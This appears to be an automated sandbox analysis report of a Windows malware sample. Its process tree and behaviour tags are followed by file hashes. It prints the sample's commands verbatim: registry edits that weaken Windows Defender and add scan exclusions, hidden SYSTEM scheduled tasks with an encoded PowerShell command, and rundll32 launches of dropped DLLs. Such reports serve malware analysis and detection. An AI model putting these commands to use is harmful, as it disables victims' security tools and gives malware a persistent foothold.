C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2144
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3860
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JuPVqtTuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JuPVqtTuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NCzfTsUHwfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NCzfTsUHwfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\phVJOPZyZJOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\phVJOPZyZJOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRZxVByAcqfAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRZxVByAcqfAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hRSVwMivPDBwjMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hRSVwMivPDBwjMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:323⤵PID:4328
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:324⤵PID:752
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:643⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:323⤵PID:704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:643⤵PID:2608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:323⤵PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:643⤵PID:3776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:323⤵PID:2060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:643⤵PID:3796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:323⤵PID:4216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:643⤵PID:4208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hRSVwMivPDBwjMVB /t REG_DWORD /d 0 /reg:323⤵PID:1512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hRSVwMivPDBwjMVB /t REG_DWORD /d 0 /reg:643⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC /t REG_DWORD /d 0 /reg:323⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC /t REG_DWORD /d 0 /reg:643⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dDIGKoNsMZUYTlNI /t REG_DWORD /d 0 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dDIGKoNsMZUYTlNI /t REG_DWORD /d 0 /reg:643⤵PID:1428
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGPbIFfGV" /SC once /ST 09:01:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGPbIFfGV"2⤵PID:4288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGPbIFfGV"2⤵PID:5036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ygwXmmYWmIOQZqgey" /SC once /ST 00:29:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\BPTxocp.exe\" c9 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ygwXmmYWmIOQZqgey"2⤵PID:4352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4904
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4340
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3280
-
C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\BPTxocp.exeC:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\BPTxocp.exe c9 /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bsajrHInQFlcwYICLj"2⤵PID:4980
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2880
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4472
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2056
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JuPVqtTuU\HMQNMm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HnhGGmYUcuANzZs" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HnhGGmYUcuANzZs2" /F /xml "C:\Program Files (x86)\JuPVqtTuU\ZDJrKBR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "HnhGGmYUcuANzZs"2⤵PID:4040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HnhGGmYUcuANzZs"2⤵PID:4216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qwZMgdHJPwAVJo" /F /xml "C:\Program Files (x86)\phVJOPZyZJOU2\ZsJuKYO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fSwSvvnEEoVJd2" /F /xml "C:\ProgramData\hRSVwMivPDBwjMVB\RLrlHWS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mBqqQEpEndyJZOmyy2" /F /xml "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\wRkuupv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IGrzNxCjwBhGmyGrIyA2" /F /xml "C:\Program Files (x86)\wRZxVByAcqfAC\buiJeUm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ClHbhijVssadMpWzU" /SC once /ST 08:54:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cweSAjAw\LJhTtMP.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ClHbhijVssadMpWzU"2⤵PID:2304
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1268
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4700
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4052
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ygwXmmYWmIOQZqgey"2⤵PID:4172
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\cweSAjAw\LJhTtMP.dll",#1 /site_id 5254031⤵PID:3624
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\cweSAjAw\LJhTtMP.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ClHbhijVssadMpWzU"3⤵PID:4180
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f86e4aa80c3636bd2d89b26f16944821
SHA1d67d851761101d6888532b1d8981e59749815531
SHA25626496563d08764d24aac79813a24c0b3b4e3eb77c70963137d37b06da33e38be
SHA512a34d90e22db028cd5fa353f8c20b02d5470bcace24288cc140731783320dac8a2da830ae0cbcc4332160cd5493fc502fee1b96ecb48fa177b948f1de6a86d206
-
Filesize
2KB
MD5465d1c6c0c39085c6f49d59ce0faae46
SHA1ee77e1d6ac5b816b73d16d920f66e4eef1f74932
SHA256d127f0dab3546e174dd603f0b4ea763c49021bf9e3850bf5492819e8d8c79f40
SHA5125b54d4a76d807f88930a1106359beec521a01fd772458cf95adcf02fcc62d41b1ad5d6157c3260a8f43bed846e50d410b6393d902334f0f64000fd1b34886d3b
-
Filesize
2KB
MD50f6a5c3c42184de1007209823f615084
SHA11d5eee096124898853a3acf943c6504d4d43dc71
SHA256b16e62ea0756a50eed6336b04c0f1098584c634ea397fe9d94445e017f2dab6d
SHA51249a191ae4773df976d17f6782f81308aa05de5de49bed0d8e081ba76d123f42dd65bd4e2424ebb1e0e15cf683008b2109e78221fff073c50f8e98fd18ea41187
-
Filesize
2KB
MD5ce531d9fd2f4844b512efde24eef99a5
SHA1524ea55f9e554e3a5de3c7c7529ab35fd9ffec7c
SHA2561a9587379e692267f2298bc2d07416dfeb6b9e05538e3a2fd8a5d60a1f7fa85b
SHA512fe3f9cd66820f39b116cfcda1d63cf95a4f09857c47b67cc10b76d261273ffc23df57a3e7e27432f5b27b9607529422f4601001567463cc457d6d6a72984ad94
-
Filesize
2KB
MD5910b700b72815410bd840c269987bdfd
SHA166c3c7d94875ce72a5256872538102602dee6974
SHA256bff6b0e09b6208dca8a95bef052cbb0aca38053531a92bdfcc4a67a484598e9b
SHA512e43c7a8141d27109ca5ccc22b0b9e45db9d31c6ae91a33b9b1e8412454479d479875f334e5b818ec4cb14682f564dee32e745c66957e1236086f1176b6a8e719
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
6.2MB
MD59f0021812f5e22fe7b0f3cefe26a195a
SHA15ced140a2cbe6410517a0d0a9c7546ac32a2478e
SHA256258f0ba8c03b44589373787899a00b7b0c0e4200a037973747d86a67a62c9826
SHA512500c03d11b955b907456c73957bdce1d1c92520de745d692c20c989307d491acb627bec1bed5373100388200e83d1665badb1c88211cf44043d4b8280002cb90
-
Filesize
6.2MB
